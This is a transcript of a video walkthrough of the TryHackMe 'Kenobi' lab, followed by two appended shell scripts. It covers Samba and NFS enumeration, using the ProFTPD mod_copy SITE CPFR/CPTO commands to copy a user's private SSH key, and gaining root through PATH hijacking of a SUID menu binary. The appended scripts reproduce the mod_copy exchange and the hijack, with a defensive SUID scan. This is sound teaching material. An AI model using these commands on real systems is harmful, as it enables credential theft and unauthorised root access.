Hello, everyone. My name is John Hammond. It's been a little while since I posted a video, so I wanted to get back in the saddle. Today I'm going to be looking at the Kenobi room from TryHackMe, so I will hop over to my screen here so you can see the good stuff. And here I am; I'm joined in this room. I believe Kenobi is a subscriber-only room, but it says: walk through on exploiting a Linux machine, enumerate Samba for shares, manipulate a vulnerable version of ProFTPD and escalate your privileges with PATH variable manipulation.

So let's go ahead and spin up this instance. I'll hit the deploy button. It says make sure you're connected, so I will have to go do that on TryHackMe, and I will sudo openvpn my VPN. I think I had a typo there; it's hard to see my keyboard when there's a microphone in my way. I could use my headset, but I feel like I just look kind of stupid and dorky.

Let's make a YouTube/Kenobi folder and move in there. I'm going to start a README so I can keep track of everything that I particularly do, because I think that is good practice. I'll also go ahead and specify that this room will have the IP address; I'll export an IP here, this guy. So I will go ahead and grab that and slap it in there. Now I'll go ahead and ping that IP address, and it looks like he's up.

Okay, so what we need to do: make sure you're connected to our network and deploy the machine. Yep, did that. Scan the machine with nmap; how many ports are open? All right, so let's head back to our terminal and make a directory nmap, and I will nmap -sC -sV, so safe scripts or default scripts, enumerate versions. I like to use -oN so I can save to the nmap directory. I will do this all on my IP address, and I'll take a trick from optionals' book: I'll use -T5 and I think it's --max-retries. Yeah, yeah, 2,500.
So this should make it a little bit faster. Hopefully; we'll see, maybe it just ruins everything. Okay, so now our nmap results are back. Let me explain that, though: that is a -T5, so the type or the kind of intensity is insane. Let's actually check out those arguments, because I didn't do a good job of explaining really what those did. Template: "While the fine-grained timing controls discussed in the previous section are powerful and effective, some people find them confusing," so you can choose the appropriate values at these different levels. Insane is the crazy, crazy fast one. Does it discuss -T5? Yeah: "I would always recommend using -T4. Some people love -T5, though it's too aggressive for my taste." So it's just banging on doors, man. And max retries: "Sets the maximum TCP scan delay to that many milliseconds." Let's check out what --max-retries is: "Caps number of port scan probe retransmissions." Okay, so if it dies, or if it can't get anything resulting back to it, it'll just kind of cap it out at that many retries.

Anyway, we have our nmap results, so let's go see what we've got here. We've got FTP open with seemingly an old version of ProFTPD. SSH is open. 80, so it has a website; oh, little robots.txt there, admin.html, we can go check that out. rpcbind on 111. NetBIOS, so Samba. Yep. 1097, that's interesting. 2049. So that's one, two, three, four, five, six, seven, eight. That seems odd to me; maybe that came out because we used those funky options there. So let's rerun that script, and I'll finagle with that when we're submitting our answers. How many ports are open? So we saw eight from our speed scan,
but I believe the correct answer is seven, because that other one, 1097, I think came out of the blue. So that hopefully showcases both the syntax of using those speed scans in nmap and how you might be kind of gambling as to what you might find. We saw that the port was filtered, so that was kind of cool; it kind of gives us a little inclination that maybe that's not right, it's not particularly open, and I guess that is what it's asking for. So seven ports are in fact open. I hadn't seen that before when I had scanned this previously. There we go. Nope, no more 1097. Okay.

Let's go on to task two. Just for our notes, I'll do a task one: "no answer needed" for him. Two: how many ports are open? I just like to document, and that probably takes away some time from the video, but I do want to emphasize, hey, that's super duper important: take notes, and that way you'll have that ready for you in the future.

All right. "Using nmap we can enumerate a machine for SMB shares," and nmap's ability to do this covers a wide variety of networking tasks; there is a script to enumerate shares. So this is awesome, because it's getting into a little bit of the NSE, or the Nmap Scripting Engine. Looks like we're going to specify that port 445, where we would typically see the information for SMB: later versions of SMB, after Windows 2000, began to use port 445 on top of a TCP stack; using TCP allows that to work. All right, and we can use --script to specify an NSE script. And again, I think I've shown before you could run locate to try and track down the files that have a .nse file extension. Let me just specify our port here. So let's go ahead and do that: I will nmap this guy.
I'll also save that output to nmap/smb-scan. And since we saved our IP address as an environment variable, we can go ahead and run that. So this is going to be great, because it's going to enumerate all of the SMB shares, the kind of file directories that are accessible to us on the network, that it is publicly sharing. We can also try to enumerate users. I like to typically use enum4linux, or that tool /opt/enum4linux, to do this as well. I store it in my /opt directory; it's not actually called enum4linux, but we could supply the host or the IP address, and that is in here. Looks like he actually has that. Okay, so what did I just type? enum4linux and the IP address. So that could spin off as well, and we could look for what it will track down for shares or users.

So this got some results here; let's go ahead and take a look at this. We have an account with guest. Looks like a hidden share; you can notice hidden, or it's kind of intended to be hidden, with the dollar sign at the end there. It has an anonymous share; we have access to read/write in it. It looks like it puts us in /home/kenobi/share on the file system, so that's kind of interesting. print$ is in there; that's pretty common, so you'll often see IPC$ and print$, those are normal, or can be normal. anonymous looks peculiar, so let's go ahead and take a look at that. How many shares were found? We found three in total. We'll just grab that and save it in our notes. Wow, I took the entire paragraph.
I hate highlighting with my mouse. One: we found a total of three. All right, what else do we have to do in here? "Most distributions of Linux carry smbclient, so let's use that to inspect one of the shares." So we can use the syntax smbclient and then whack whack, or two forward slashes, on the IP address, and specify the share with another forward slash, anonymous being the share that we want to access. "Using your machine it will connect to the machine's network share. Once you connect, list the files in the share. What is the file you can see?" Let's go check it out. How did enum4linux do? He's still going. Okay, he found the exact same shares: anonymous, print$, etc. Very, very cool. Looks like he's kind of brute-forcing IDs and stuff like that; we don't need to worry about that.

Let's go ahead and run smbclient. I do have that readily available; I don't know if it is installed for you, you might need to sudo apt install smbclient or some Samba tools or stuff like that. Let's go ahead and run that command, though: smbclient with the IP address, and I'll use the anonymous share. It's going to want to know my password, because I didn't specify a username, so it's going to use mine and ask for mine by default. That doesn't matter, because we're just going to kind of use anonymous access, so if I just whack enter it will let me log in. I'm not specifying a password; the user doesn't particularly matter; we have anonymous access on this. So I'll type in ls to list some files out, and we can see there is a log.txt file here on that share. Let's go ahead and supply that; I'll give that as our answer here for number two. Good, good. "You can recursively download the SMB share; submit the username and password as nothing, just as we did: smbget." That's kind of cool; I haven't actually used this tool before, so this is kind of some new learning for me, and that's what it's all about, right?
smb://, using kind of a scheme here to preface our IP and the share. So let's go ahead and do that. I will actually break out of this guy and I'll make a directory samba so I can put those all in a specific place, and it's smbget -R. If you want to check out the other arguments and parameters you can pass to smbget, again, you've got the man pages: "wget-like utility for downloading files over SMB." So that -R is recursive, and it'll download just about everything. Let's do it: let's use smbget -R, smb:// as our scheme, IP address, anonymous, and again it's going to ask for a password; just whack enter. It should be able to pull some stuff down; might be a little bit. Let's find out. Oh, he got it; he got log.txt. Okay, sweet.

What is in that log.txt? Whoa, a lot of seemingly interesting stuff. Okay: generating a public and private RSA key pair. Generating a file in, okay, the directory /home/kenobi/.ssh. Oh, so they're making an SSH key. Seemingly no password; maybe we don't need one there. We don't know if that's their input in there. So they've saved their private key and their public key. Oh, we also have ProFTPD; we did see that as a service. Okay, looks like the config file for it. Default port. Oh, it's running as kenobi, which is kind of interesting, because maybe we could potentially reach that SSH key. DefaultRoot is commented out, so they're in a jail thing. "Normally, we want files to be overwriteable." Anonymous puts us in there. All the service is running as kenobi, so we probably have access to what kenobi can access. We also have SMB, or our Samba share. A lot of information in that; there's a lot of comments here; this is kind of hard to scroll through. We could very well write to that directory, though; it's worth a try. Yeah, read only. Doesn't seem to be particularly concerned. anonymous: browsable, yes; read only, yes; guest ok, yes. Huh. Is it really read-only?
Oh, maybe for the person accessing the share, but not on the actual file system; it's just going to show that location. So if we were to use some other technique to move the SSH private key into the share, we could still access it as a user reading and reaching into the share. So maybe we'll have to use some other technique here.

They ask us, okay, what port is FTP running on? Well, we already found that from our nmap scan. Let's go ahead and submit that; that's number two. Sorry, that's number three here: what port is FTP on? Did I just copy that text? Yeah, I did. 21. Just good to keep notes.

And they're going to mount some information. "Our earlier nmap scan provided that 111 is running rpcbind. When an RPC service is started, it tells rpcbind the address at which it is listening and the RPC program number it's prepared to serve. In this case, it can access a network file system." So we have some network shares. Now, I typically see this on like port 2049, right, because NFS, but I guess those are kind of paralleled and pulled together. Let's hop out of this directory and go see what that has. What I do typically for this is, because it's using showmount... oh, um, is that the right IP address? I think so. Yeah, yeah, yeah, whatever, I'll just change that, and it shows me that there is a /var file or folder there. I would do that with showmount, so showmount -e and then the IP address, which I need to go ahead and add in here: showmount -e $IP, and that will tell me the exact same information. So /var is a folder we could go ahead and access and mount; so that's what they were asking for here. Let's go ahead and submit that: what mount can we see? Let's go slap that into our notes. I literally just copied and pasted this; why am I typing it out?
I've done this like out of habit for the last couple of videos, and for things that I've been doing for my own recording, just for me to go through some TryHackMe stuff. It's just habit, hand-jamming everything in, because copying and pasting is so frustrating.

ProFTPD. Okay, so now we're taking a look at that FTP server. "ProFTPD is a free and open source FTP server, compatible with Unix and Windows." Well, it's been a while since I made a video. "It's also vulnerable in some past software versions." Okay, we get the version of our ProFTPD; let's use netcat to go check that out. So you could do a simple banner grab with netcat: we could just connect with netcat to that IP address on port 21, and it'll tell me, hey, that's the version. We also saw that in our results from our nmap scan. So that's kind of pretty easy and handy to find out. What is the version? 1.3.5.

"We can use searchsploit to find exploits for particular software versions. searchsploit is basically just a command line search tool for exploit-db.com." It's pretty awesome. "How many exploits are there for ProFTPD running?" So if you haven't heard of searchsploit before, I do want to showcase this, because it's fantastic. If you go check out Offensive Security's exploitdb GitHub, they do have, hey, like a locally available copy of their entire exploit database that you'd normally navigate through online. They also offer a command line tool, searchsploit, that lets you go ahead and look through all of those entries in the database. So if you can grab just the software name or the software version number, you could pretty easily, okay, let's see, what does the public already know about this? Is it vulnerable? Is there anything I can exploit? So there's some really cool stuff. And normally what I would do is I would git clone this, so in my /opt directory, because that's where I tend to store a lot of my tools, I have my exploitdb directory, and searchsploit is in there.
So I would just create this as a prompt; I'd modify my prompt to allow myself to just run searchsploit from anywhere I'd like to be. So I was in TryHackMe/YouTube/Kenobi and I could just run searchsploit, and there we go; now I have all the arguments. But normally searchsploit is pretty easy to use, because you could just specify what it is that you're looking for as search terms, like literally just arguments following that, and it'll find stuff for you. So let's check this out. If I run searchsploit on ProFTPD version 1.3.5, now we've got some results. So it looks like it's asking for how many we found, and we found three. Let's go check that out; taking good notes. You probably hate me for it, but I just want to showcase it.

"You should have found an exploit from ProFTPD's mod_copy module. The mod_copy module implements SITE CPFR and SITE CPTO commands, which can be used to copy files and directories from one place to another on the server. Any unauthenticated client can leverage these." Unauthenticated client, so we don't need to know any credentials; we don't need to know kenobi's password; we don't need to know any other user's credentials to log into that FTP service. We can just do it via netcat, which is kind of cool. "Copy files from any part of the file system to a chosen destination." So we know that the FTP service is running as the kenobi user from the file on the share; we saw that in that log.txt file, and an SSH key was generated for that user. So we could potentially pull that SSH key into a location that we can read and access, and then pull it in, and then use it, and then SSH as that user, kenobi.
So let's go ahead and do that. If you want to take a look at some of these, I'll use searchsploit; I'll actually just grab this text file, because it will go and explain it. You can use -x with searchsploit to examine an entry given the path there, so you can just copy and paste that in, and this will kind of talk about, hey, what syntax is really kind of in place for this sort of attack. And it's going to use these SITE CPFR commands to say this is the file that I want to copy, and this is where I want to copy it to. And they're actually using a really cool technique here, because they're using PHP, perhaps on the website, so they could potentially create some PHP code into port 80, or what's being served on the web page, and then, because that page will be rendered with PHP, you could potentially get remote code execution and execute code and commands. Maybe we could do this too; I don't think I'm going to go into that in this video. But when I used to teach, and I taught the cyber threat emulation course, this is something that I actually baked into the course: this exact exploit, ProFTPD 1.3.5, showcasing the mod_copy technique, and showing that we could gain code execution. And the Metasploit module actually does that. So if you want to go check out the source code of the Metasploit module, like checking this out, this is pretty neat: you can see here's a description that you would normally see within Metasploit; you could scroll through and see what arguments, parameters and options they set, and it'll walk through the actual exploit in Ruby, which is very, very cool. They use some interesting techniques, because they use /proc/self/cmdline, which will allow you to include the PHP payload to get the remote code execution. I used this in the classroom because it was kind of cool, and there were only three exploits, but they showcase different ways of doing the same technique. The text file just explained it, showcased some syntax; the Metasploit module showcases it
really, really well. But I was trying to say, hey, not all the time can we use Metasploit; we don't always want to do that. We kind of want to understand the exploit and see how we can weaponize it and write it ourselves, and we were doing that in the class typically within Python, because Python's like my golden sword, right? I love that thing. So we would take a look at this Python code that someone has an exploit written in, but it's kind of weird in that, okay, it's old Python 2. It's kind of hard to read, really pretty difficult to look at, but you can see what they're doing for including commands. They include it just as an argument, and then that's a static command; you can't modify that or change that with like a GET variable or POST variable. And the way that they use that /proc/self/fd file descriptor is kind of just a guess on what socket or what file descriptor is actually open for that. So using /proc/self/cmdline as their copy-from is a much better technique, because it'll ensure that your PHP code is actually visible and can be copied, for writing to the web server, being able to see that PHP page and have it be executed as you access it. So anyway, sorry, tangent; just some tinkering thoughts of teaching and showcasing this exploit and what you can do with it.

Anyway, we know that it will allow us to copy one file to another location in the file system, unauthenticated, and because the FTP server is running as the kenobi user, we could access kenobi's files, his SSH key, and potentially put it maybe in the Samba share so we could access it. So TryHackMe includes a pretty nice picture just to showcase this: netcatting to the IP address, using the SITE CPFR commands and SITE CPTO. You should be able to see these kind of partial responses from the FTP server. So let's go ahead and do that. Let's go do our netcat, IP address, port 21. So let's use our SITE CPFR.
So copy from /home/kenobi/.ssh/id_rsa, because that's his private key. And we know the location of this NFS share as well; it's also in /var/tmp, or /var, right? That's what it's sharing for us, and we could just create a directory in there, tmp, and copy our id_rsa file over there. So let's do that. Let's use SITE CPTO /var, let's make a tmp directory, and id_rsa, and that successfully copied it.

So if I were to go use smbclient one more time, where I went over to that IP address on the anonymous share, empty password, now we can go ahead and check out ls. Um, we seemingly do not have that tmp directory. tmp? Nope. Is it just not there? Let's try that netcat syntax again: SITE CPFR; can I put it in just /var/id_rsa? Nope. Okay, so I need to have a directory there. How do they do this? Oh, maybe it's just not showing it as we read it; we need to mount that tmp directory to our machine, or /var, the share that it's sharing, but not the actual file system, because if we look at tmp... hmm. We could check out that log.txt file and see what it's really sharing; we have that in samba. A little bit of learning for me. Okay, anonymous puts it in /home/kenobi/share, and that's all. Oh, the mount, the mount is different. I was doing the wrong thing; I was using the NFS share... I was connecting to the SMB share when I should have been connecting to /var, that is an NFS share. Sorry, I got confused.

Let's go ahead and make a directory that we can go ahead and copy this to. So let's make a directory, um, let's just call it nfs, and then we're going to use mount with the machine IP address, colon, /var, and that's going to understand, okay, this is an NFS share we're going to connect to, and I'll put it in the nfs directory. So let's do that. Let's use mount, um, IP for the box, :/var, to nfs, the directory that we just created. Looks like I need to be root, so let me sudo that. Takes a second, because there's probably a lot to boot in there. Okay. Yep.
So let's now move into that nfs directory that we just made, and let's see what we have. Seemingly the file system. Okay, so because we put it in tmp, now we have an id_rsa file in there. So that's going to actually be kenobi's SSH key. Let's go ahead and copy that out, up, up, up. And because that's all we needed, I'm actually going to sudo umount nfs, so when I disconnect from the VPN it doesn't get all messy and make that folder hang every single time. There we go. Let's say that we've done that.

And we need to now use that id_rsa key to SSH in as the kenobi user. So let me go ahead; I will make that id_rsa permissions 600 with chmod, so only I can read it, and it's a safe and secure SSH key that SSH will be willing to use. And I'll specify kenobi@ our IP address, and I need to specify the dollar sign IP address, because it will resolve the variable. Yes, I'm totally cool to connect to it, and there we go. We're in; we are logged in as kenobi. So what do we have in here? We have our user.txt flag, which we need to go ahead and submit for that answer here. Oh, we hadn't been taking notes. My bad. Who cares? Don't actually have that mentality. We get initial access. Why is that still wrong? Okay, we need to mark some of these things as completed, sorry.

Now we're moving on to task four: privilege escalation with PATH variable manipulation. Okay, so we're talking about some SUID binaries. "Let's first understand what SUID, SGID and sticky bits are. The SUID bit allows the user executing the file to have the permissions of the owner of the file." So if I executed something as kenobi, and that file were owned by root, if it had a SUID bit, I would still be operating everything that that binary or that program would do, or that file would do, as the root user.
So that's awesome, because that's potentially a privesc. "SGID, sticky bit. SUID bits can be dangerous." Yep, potentially a privesc. "Some binaries, such as passwd, like the command passwd, need to be run with elevated privileges, as it's resetting your password on the system. However, other custom files that have the SUID bit can lead to all sorts of issues. To search the system for these files, run the following." Okay, so they give us a good find command to use here. Let's go ahead and run that. So this will look for the permissions that have a sticky, or sorry, that s, representing a SUID bit, and looking for files, and all the standard error being redirected to nowhere.

So looking through this, there are a few of these here that kind of look normal, and I guess the understanding and exposure of what looks normal is just kind of from experience, from just doing this a little bit more. Or you could use your own host system as a baseline. So I'm connected to Kenobi down here on my bottom, and I'll actually change the color here so you can see that that is the target, and this down here is my host. If I ran that same command, we could see all the weird binaries on my system that are SUID. I don't happen to have some of the ones that they have, but I see su, I see ping, mount, the others, etc. umount is in there, sudo is in there. I don't see /usr/bin/menu. So /usr/bin/menu kind of sticks out to me as odd and strange and weird; maybe that's something custom. So let's copy that and submit that as our answer for this guy, and that's correct. Now "run the binary; how many options appear?" Okay, so let's go ahead and run here. It's a status check, kernel version and ifconfig, so there are three options. And we could try some of these. Status check: okay, it looks like it made an HTTP request; interesting. What does the kernel version do? Okay, that tells us something from uname -a, potentially. Oh, ifconfig, it's just going to run that command, huh?
So strings is a command on Linux that looks for human-readable strings in a binary. So if I were to run strings on that /usr/bin/menu, we could look for some of the things that maybe that's doing. Looks like status check, okay, that's actually going to run curl on our localhost; kernel version, we know, uname -r; and ifconfig will run, potentially, ifconfig. We don't know for sure, because we aren't looking at the source code here; we're just looking at the strings in the binary. But because these are running commands without kind of a fixed path, without the absolute path, it's just curl, whatever happens to be in your PATH first, and it's running as a SUID binary. Let me show you that: ls -l, you can see it's rws for that SUID; you can see it's kind of all in red, and noted that, hey, this is owned by root. So, SUID binary; this command will execute in the context of the root user. So we can abuse this, because we know, okay, it's running curl, and we could kind of create our own curl binary that's going to happen, or be executed, first, because we can put that higher up in our PATH, and make that executable.

You can see TryHackMe includes a good picture for this; let me show you that. Let's just copy /bin/sh or /bin/bash; I'll do that and I'll make it a curl directory, right in here, or a curl file. So I have ./curl, which is going to give me another bash shell. So I'll exit that and go back to my regular shell. But now that we've created this binary named curl, and it's going to have the same name as what this program tries to run, if we modify our PATH to call that binary first, because it's executing with the permissions of root with the SUID binary, it should give us a root shell. So let's do that. We could check out our PATH variable, and we could actually modify our PATH variable. If I say, let's export PATH to our current directory, right, /home/kenobi, it actually has been in there as a potential path. So we could, let's, let's use both.
Let's say /home/kenobi, let's modify that, separated with a colon, because that is the delimiter for the PATH variable, and let's include the rest of the PATH variable inside of it here. So now that we've set that, we could go with an echo $PATH, and you can see my home directory, /home/kenobi, is just in there, just as well. So if I run curl by default now, it's going to give me a bash shell rather than running the curl command, because it's reaching that path first in the PATH expansion, PATH variable expansion. So now if I were to try and run our /usr/bin/menu, and if I were to go ahead and check our status, it looks like we don't have curl localhost; that happened because it's executing that binary and not including -p. That might be how it's done. They use an echo command, which is interesting to me, because it might just be executing that simply as a script, potentially. Making a lot of flops in this video. Let's, let's, let's change that up. Let's rm -r curl, and let's now make an echo /bin/bash; that's kind of just a simple file, or a script. cat curl: it's going to run /bin/bash. Now let's run our /usr/bin/menu and choose one. Now it didn't do that whatsoever; kind of peculiar. Maybe we could use our sh. So they put it in tmp, /bin/sh; maybe sh will keep the permissions rather than bash. So let's just try it in our curl one more time. If I were to run curl... oh, I still need to mark it as executable, so that's probably why it didn't run earlier. If I were to curl now, I have a regular shell. If I were to run our menu, now I have the root shell. Does sh keep its permissions without specifying an argument? Because bash, I know, you probably need the -p. Let's try doing that with bash rather than using echo, or while using echo rather than making a binary; let's just have it be kind of a file to execute that is a script, and then it will run bash -p into curl. So now when I run curl it gives me a shell; if I go back to run my menu, if I run status check, now I'm root.
Okay, so sh, excuse me, sh does not need to have that -p argument to kind of maintain the permissions; bash does. So now that I'm root, okay, let's go ahead into my root directory, and I have a root flag in there, so we can cat that out and call that box done.

Okay, so real box, real video, real thing. Obviously I made a couple of mistakes in there, but hopefully those showcase some learnings, not just for me but also for you. And it's cool and peculiar, because, well, maybe we didn't need to even specify our own addition to the PATH, because we saw, when we checked out that PATH variable, we also already had /home/kenobi/bin, and we could very well just create that directory. We could have made that, not having to modify that PATH variable, since it already has some of our own locally writable locations in there.

Okay, I'm losing some steam. I am going to call this video done. I'm going to wrap this up and say, okay, cool, we completed Kenobi. I hope you guys enjoyed; I hope you liked this video. If you did, please do press that like button, do the YouTube algorithm things, leave a comment, say whatever you want. Subscribe would be great. I'd love to see you guys on the Discord server, Patreon, PayPal, LinkedIn, Twitter, all this stuff, all the internet things. All right, I'll see you guys later. Thanks so much for watching. Take care.
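The SITE CPFR / SITE CPTO exchange from the ProFTPD part of the walkthrough, as an added example that is not from the video, TryHackMe or any exploit-db entry. The client side emits exactly the lines the video types into netcat; the server side is a constructed fake that answers the way an unpatched ProFTPD 1.3.5 mod_copy does (reply text approximated from memory, not captured from the box), plus a "patched" mode that models a build where mod_copy demands a login first, which is the fix that shipped in 1.3.5a. The paths, the fake server and the checker are all assumptions made for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the video or the room: the mod_copy exchange,
# client and (fake, constructed) server, so both sides can be read offline.

# Client side: the three lines you would pipe into `nc "$IP" 21`.
# $1 = source path on the server, $2 = destination path on the server.
mod_copy_cmds() {
    printf 'SITE CPFR %s\r\n' "$1"
    printf 'SITE CPTO %s\r\n' "$2"
    printf 'QUIT\r\n'
}

# Fake server side (constructed): reads FTP commands on stdin and answers on
# stdout. With no argument it accepts SITE CPFR/CPTO before any USER/PASS,
# which is the bug; with the argument "patched" it refuses them until login.
fake_proftpd() {
    patched=${1:-}
    printf '220 ProFTPD 1.3.5 Server (ProFTPD Default Installation)\r\n'
    while IFS=' ' read -r verb arg rest; do
        verb=$(printf '%s' "$verb" | tr -d '\r')
        arg=$(printf '%s' "$arg" | tr -d '\r')
        case "$verb" in
            QUIT) printf '221 Goodbye.\r\n'; return 0 ;;
            SITE)
                if [ -n "$patched" ]; then
                    printf '530 Please login with USER and PASS\r\n'
                elif [ "$arg" = CPFR ]; then
                    printf '350 File or directory exists, ready for destination name\r\n'
                elif [ "$arg" = CPTO ]; then
                    printf '250 Copy successful\r\n'
                else
                    printf '500 SITE %s not understood\r\n' "$arg"
                fi ;;
            *) printf '530 Please login with USER and PASS\r\n' ;;
        esac
    done
}

# Result check: reads the server's replies on stdin and returns 0 only if a
# 350 (source accepted) was followed by a 250 (copy done), 1 otherwise.
# Use it on a real session too: `mod_copy_cmds src dst | nc "$IP" 21 | mod_copy_ok`.
mod_copy_ok() {
    awk 'BEGIN { state = 0 }
         /^350 / && state == 0 { state = 1 }
         /^250 / && state == 1 { state = 2 }
         END { exit (state == 2 ? 0 : 1) }'
}

# Offline demonstration: unpatched server accepts the copy, patched one does not.
if mod_copy_cmds /home/kenobi/.ssh/id_rsa /var/tmp/id_rsa | fake_proftpd | mod_copy_ok; then
    echo "unpatched mod_copy: unauthenticated copy accepted"
fi
if ! mod_copy_cmds /home/kenobi/.ssh/id_rsa /var/tmp/id_rsa | fake_proftpd patched | mod_copy_ok; then
    echo "patched mod_copy: SITE CPFR refused before login"
fi
```

The check function is the part worth keeping around: against a live target, pipe the netcat session through `mod_copy_ok` and branch on its exit status instead of eyeballing the 350/250 lines, and treat a 530 on SITE CPFR as a sign the host is running a fixed build (or has mod_copy disabled), not as a reason to retry.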
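The PATH hijack from the privilege escalation part, as an added example that is not from the video or the room. It runs entirely as the current user: a small "menu" script that calls `curl` by bare name stands in for the SUID /usr/bin/menu binary, a hardened variant resets PATH and calls /usr/bin/curl by absolute path (that location is an assumption; if curl is not installed the hardened script errors out instead of running the planted file, which is the point), and a planted `curl` announces itself rather than spawning a shell. It demonstrates the lookup that the SUID bit turns into root code execution; it does not create a SUID binary. It also defines a defender-side scan for SUID-root executables that embed unqualified command names, which is the `strings` check from the video done over the whole `find -perm -4000` list. On the box, the planted file was `/bin/sh` or `bash -p`: bash resets an effective uid that differs from the real uid unless -p is given, sh (dash) does not.

```shell
#!/bin/sh
# Added example, not code from the video or the room: PATH resolution abuse
# beside the hardened form, run as an ordinary user. All files under $WORK
# are constructed here for the demonstration.

setup_demo() {
    WORK=$(mktemp -d)

    # "Vulnerable" program: calls curl by bare name, as strings on the SUID
    # menu binary showed. Whatever PATH finds first is what runs.
    cat > "$WORK/menu_vuln" <<'EOF'
#!/bin/sh
curl -I localhost 2>&1
EOF

    # Hardened program: fixed PATH and an absolute path to the binary, so a
    # caller-controlled PATH cannot change which curl runs (/usr/bin/curl assumed).
    cat > "$WORK/menu_fixed" <<'EOF'
#!/bin/sh
PATH=/usr/sbin:/usr/bin:/sbin:/bin
export PATH
/usr/bin/curl -I localhost 2>&1
EOF

    # Attacker's curl: on the target this was /bin/sh; here it only reports.
    cat > "$WORK/curl" <<'EOF'
#!/bin/sh
echo "HIJACKED as uid=$(id -u)"
EOF
    chmod +x "$WORK/menu_vuln" "$WORK/menu_fixed" "$WORK/curl"
}

cleanup_demo() {
    rm -rf "$WORK"
}

# Run a demo program with the attacker's directory prepended to PATH, the
# same effect as `export PATH=/home/kenobi:$PATH` on the box; first line only.
run_with_hijacked_path() {
    PATH="$WORK:$PATH" "$WORK/$1" | head -n 1
}

# Defender's check: every SUID-root executable on the host, searched for
# command names used without a leading slash. Falls back to tr when strings
# is not installed. Prints "binary: command" for each hit.
suid_bare_commands() {
    find / -perm -4000 -user root -type f 2>/dev/null | while read -r bin; do
        { strings "$bin" 2>/dev/null || tr -c '[:print:]' '\n' < "$bin"; } |
            grep -E '^(curl|wget|ifconfig|uname|cat|ps|netstat|id)( |$)' |
            sed "s|^|$bin: |"
    done
}

setup_demo
run_with_hijacked_path menu_vuln    # HIJACKED as uid=<your uid>
run_with_hijacked_path menu_fixed   # real curl output or an error, never HIJACKED
cleanup_demo
```

Run `suid_bare_commands` on a host you are auditing: any line it prints is a root-owned SUID program that trusts the caller's PATH, and /usr/bin/menu on this box would have shown up as `curl -I localhost`. The fix on the program side is what `menu_fixed` does; on the system side it is not shipping custom SUID helpers at all.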